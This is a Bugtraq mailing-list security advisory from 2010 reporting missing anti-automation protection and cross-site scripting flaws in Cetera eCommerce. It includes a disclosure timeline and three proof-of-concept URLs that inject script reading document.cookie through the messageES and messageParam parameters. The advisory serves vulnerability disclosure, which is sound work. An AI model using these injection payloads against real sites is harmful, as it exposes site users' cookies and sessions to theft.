Bugtraq mailing list archives
Vulnerabilities in Cetera eCommerce
From: "MustLive" <mustlive () websecurity com ua>
Date: Wed, 28 Jul 2010 20:00:22 +0300
Hello Bugtraq!I want to warn you about security vulnerabilities in Cetera eCommerce. Which I disclosed already in December 2009 (SecurityVulns ID: 10489).
----------------------------- Advisory: Vulnerabilities in Cetera eCommerce ----------------------------- URL: http://websecurity.com.ua/3640/ ----------------------------- Affected products: Cetera eCommerce 14.0 and previous versions. ----------------------------- Timeline: 01.03.2009 - found vulnerabilities. 30.10.2009 - announced at my site. 31.10.2009 - informed developers. 23.12.2009 - disclosed at my site. ----------------------------- Details:These are Insufficient Anti-automation and Cross-Site Scripting vulnerabilities.
Insufficient Anti-automation: http://site/ http://site/account/There is no protection against automated requests (captcha) in forms at these pages.
XSS: http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
Current thread:
- Vulnerabilities in Cetera eCommerce MustLive (Jul 28)